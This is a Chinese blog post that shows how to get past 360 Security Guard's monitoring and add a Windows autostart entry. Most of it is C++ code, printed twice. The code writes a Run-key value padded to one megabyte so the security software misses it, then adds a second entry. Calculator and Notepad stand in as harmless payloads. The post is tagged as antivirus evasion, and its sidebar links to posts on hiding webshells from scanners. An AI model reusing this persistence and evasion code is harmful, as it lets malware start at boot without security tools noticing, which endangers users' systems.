绕过360安全卫士写自启动项

发表于 2012年11月18日
VC

360把自启逼上死路，系统各种敏感操作全监控，服务注册强上线什么的，，意义都不大了，很多人去掉了自启;

但在我看来这样已经推动了本身的意义了，下边这方法也有些老了不一定有用，但也是种思路

360的各种误报误杀，将会越来越多，你成立再及时的误报检测部门也没用，这跟你小偷小摸的做法相扣

360安全卫士写自启动项

int _tmain(int argc, _TCHAR* argv[])
{
HKEY hKey;
char *Path,*Path2="c:\\windows\\notepad.exe   --";
LONG ret;
ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
if(ret)
{
   printf("打开注册表项失败");
   return 0;
}
Path=new char[1024*1024];
memset(Path,'p',1024*1024);
memcpy(Path,Path2,strlen(Path2));
ret=RegSetValueEx(hKey,"TEST",0,REG_SZ,(BYTE *)Path,strlen(Path));
if(ret==0)
{
   printf("写入成功");
}
else
{
   printf("写入失败");
}
strcpy(Path,"c:\\windows\\system32\\calc.exe");
ret=RegSetValueEx(hKey,"TEST2",0,REG_SZ,(BYTE *)Path,strlen(Path));
if(ret==0)
{
   printf("写入成功");
}
else
{
   printf("写入失败");
}
return 0;
}

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

int _tmain(int argc, _TCHAR* argv[])

{

HKEY hKey;

char *Path,*Path2="c:\\windows\\notepad.exe --";

LONG ret;

ret=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);

if(ret)

{

printf("打开注册表项失败");

return 0;

}

Path=new char[1024*1024];

memset(Path,'p',1024*1024);

memcpy(Path,Path2,strlen(Path2));

ret=RegSetValueEx(hKey,"TEST",0,REG_SZ,(BYTE *)Path,strlen(Path));

if(ret==0)

{

printf("写入成功");

}

else

{

printf("写入失败");

}

strcpy(Path,"c:\\windows\\system32\\calc.exe");

ret=RegSetValueEx(hKey,"TEST2",0,REG_SZ,(BYTE *)Path,strlen(Path));

if(ret==0)

{

printf("写入成功");

}

else

{

printf("写入失败");

}

return 0;

}

标签：360 , 免杀原文连接：绕过360安全卫士写自启动项 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

IE下js调试工具Companion.JS 汇编免杀基础知识

PowerShell脚本免杀/bypass/绕过杀毒软件

PowerShell脚本免杀/bypass/绕过杀毒软件

回调函数绕过D盾小套路

回调函数绕过D盾小套路

Windows杀毒软件进程与描述收集

Windows杀毒软件进程与描述收集

可执行文件代码变形引擎，用于免杀与混淆：metame

可执行文件代码变形引擎，用于免杀与混淆：metame

免杀WebShell PHP一句话，过D盾

免杀WebShell PHP一句话，过D盾

利用PHP反序列化免杀D盾、安全狗等WAF软件

利用PHP反序列化免杀D盾、安全狗等WAF软件

异或免杀D盾PHP一句话

异或免杀D盾PHP一句话

再丢个过D盾免杀PHP一句话木马

再丢个过D盾免杀PHP一句话木马

两个生成式AI 平台推荐，生产力亲测

两个生成式AI 平台推荐，生产力亲测

如何知道移动应用程序是否是使用 Flutter 制作的？

如何知道移动应用程序是否是使用 Flutter 制作的？

禁用WordPress 6.7 中延迟加载图像的自动调整大小

禁用WordPress 6.7 中延迟加载图像的自动调整大小

王慧文清华产品课

王慧文清华产品课

Mos macOS下平滑鼠标滚动/滚动方向小工具

Mos macOS下平滑鼠标滚动/滚动方向小工具

Flutter 中设置 Google Maps 样式深色模式

Flutter 中设置 Google Maps 样式深色模式

解决WordPress上传svg/ico/webp，您无权上传此文件类型

解决WordPress上传svg/ico/webp，您无权上传此文件类型

cursor, 一款基于 vscode 的 AI IDE

cursor, 一款基于 vscode 的 AI IDE